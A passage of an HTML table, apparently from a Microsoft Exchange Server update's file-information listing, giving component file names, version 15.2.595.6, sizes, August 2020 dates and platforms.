5.6</td><td>23,936</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.595.6</td><td>97,664</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.595.6</td><td>1,266,056</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.595.6</td><td>1,266,056</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>15,868</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.595.6</td><td>87,424</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,112</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.595.6</td><td>52,104</td><td>12-Aug-2020</td><td>20:43</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.595.6</td><td>292,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.595.6</td><td>73,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.595.6</td><td>45,952</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.595.6</td><td>218,496</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.595.6</td><td>78,200</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.595.6</td><td>936,840</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.595.6</td><td>336,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.595.6</td><td>52,608</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.595.6</td><td>32,128</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.595.6</td><td>60,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.595.6</td><td>854,400</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.595.6</td><td>291,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.595.6</td><td>39,296</td><td>12-Aug-2020</td><td>
20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.595.6</td><td>76,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.595.6</td><td>166,784</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.595.6</td><td>1,486,720</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.595.6</td><td>122,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.595.6</td><td>12,327,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.595.6</td><td>264,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.595.6</td><td>37,768</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.595.6</td><td>186,752</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.595.6</td><td>64,384</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.595.6</td><td>83,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.595.6</td><td>63,864</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.595.6</td><td>100,224</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.595.6</td><td>144,768</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.595.6</td><td>270,208</td><td>12-Aug-2020</td><td
>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.595.6</td><td>15,752</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.595.6</td><td>130,440</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.595.6</td><td>254,336</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.595.6</td><td>37,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.595.6</td><td>640,384</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.595.6</td><td>37,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.595.6</td><td>146,312</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.595.6</td><td>594,824</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.595.6</td><td>99,720</td><td>12-Aug-2020</td><td>20:42</td>
<td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.595.6</td><td>42,376</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.595.6</td><td>40,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.595.6</td><td>54,144</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.595.6</td><td>164,224</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.595.6</td><td>58,752</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.595.6</td><td>204,168</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.595.6</td><td>17,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.595.6</td><td>30,600</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.595.6</td><td>38,776</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.595.6</td><td>48,520</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.595.6</td><td>180,608</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.595.6</td><td>36,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.595.6</td><td>25,992</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.595.6</td><td>1,868,160</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Micro
soft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.595.6</td><td>54,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.595.6</td><td>263,040</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.595.6</td><td>263,040</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.595.6</td><td>24,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.595.6</td><td>24,968</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.595.6</td><td>53,128</td><td>12-Aug-2020</td><td>20:42</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.595.6</td><td>216,960</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.595.6</td><td>32,128</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.595.6</td><td>281,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.595.6</td><td>83,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.595.6</td><td>94,088</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.595.6</td><td>1,840,008</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.595.6</td><td>71,560</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.595.6</td><td>175,488</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.595.6</td><td>45,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.595.6</td><td>159,616</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.595.6</td><td>51,072</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.595.6</td><td>45,952</td><td>12-Aug-2020</td><td>20:41</t
d><td>x64</td></tr><tr><td>Microsoft.exchange.s
ecurity.applicationencryption.dll</td><td>15.2.595.6</td><td>221,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.595.6</td><td>1,558,400</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.595.6</td><td>19,840</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.595.6</td><td>225,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.595.6</td><td>5,151,112</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.595.6</td><td>214,920</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.595.6</td><td>115,584</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.595.6</td><td>82,816</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.595.6</td><td>80,768</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.595.6</td><td>66,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.595.6</td><td>81,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.595.6</td><td>211,848</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.595.6</td><td>1,340,800</td><td>12-Aug-2020</td><td>20:4
1</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.595.6</td><td>511,880</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.595.6</td><td>47,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.595.6</td><td>873,336</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.595.6</td><td>1,352,072</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.595.6</td><td>30,592</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.595.6</td><td>130,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.595.6</td><td>1,018,760</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.595.6</td><td>111,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.595.6</td><td>60,808</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.595.6</td><td>50,560</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globalloc
atorcache.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.595.6</td><td>74,112</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.595.6</td><td>8,493,952</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.595.6</td><td>633,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.595.6</td><td>1,651,072</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.595.6</td><td>296,320</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.595.6</td><td>43,400</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.595.6</td><td>233,344</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.595.6</td><td>178,568</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.595.6</td><td>348,544</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.595.6</td><td>56,704</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.595.6</td><td>93,064</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common
.dll</td><td>15.2.595.6</td><td>296,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.595.6</td><td>114,560</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.595.6</td><td>53,632</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.595.6</td><td>75,136</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.595.6</td><td>142,720</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.595.6</td><td>58,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.595.6</td><td>27,016</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.595.6</td><td>28,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.595.6</td><td>26,496</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Mi
crosoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.595.6</td><td>31,616</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.595.6</td><td>1,205,128</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.595.6</td><td>158,592</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.595.6</td><td>628,096</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.595.6</td><td>16,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</td><td>15.2.595.6</td><td>13,176</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.595.6</td><td>221,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.595.6</td><td>29,056</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.595.6</td><td>138,632</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.595.6</td><td>21,896</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.595.6</td><td>40,312</td><td>12-Aug-2020</td><td>20:45</
td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.595.6</td><td>22,920</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.595.6</td><td>212,360</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.595.6</td><td>98,696</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.595.6</td><td>22,920</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.595.6</td><td>169,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.595.6</td><td>20,872</td><td>12-Aug-2020</td><td>20:44</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.595.6</td><td>31,616</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.595.6</td><td>30,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.595.6</td><td>53,128</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.595.6</td><td>44,936</td><td>12-Aug-2020</td><td>20:44</td><td>x86</td>
</tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.595.6</td><td>46,464</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.595.6</td><td>28,040</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.595.6</td><td>457,088</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.595.6</td><td>30,592</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.595.6</td><td>4,183,936</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.595.6</td><td>182,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.595.6</td><td>121,736</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.595.6</td><td>403,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.595.6</td><td>89,984</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.595.6</td><td>88,960</td><td>12-Aug
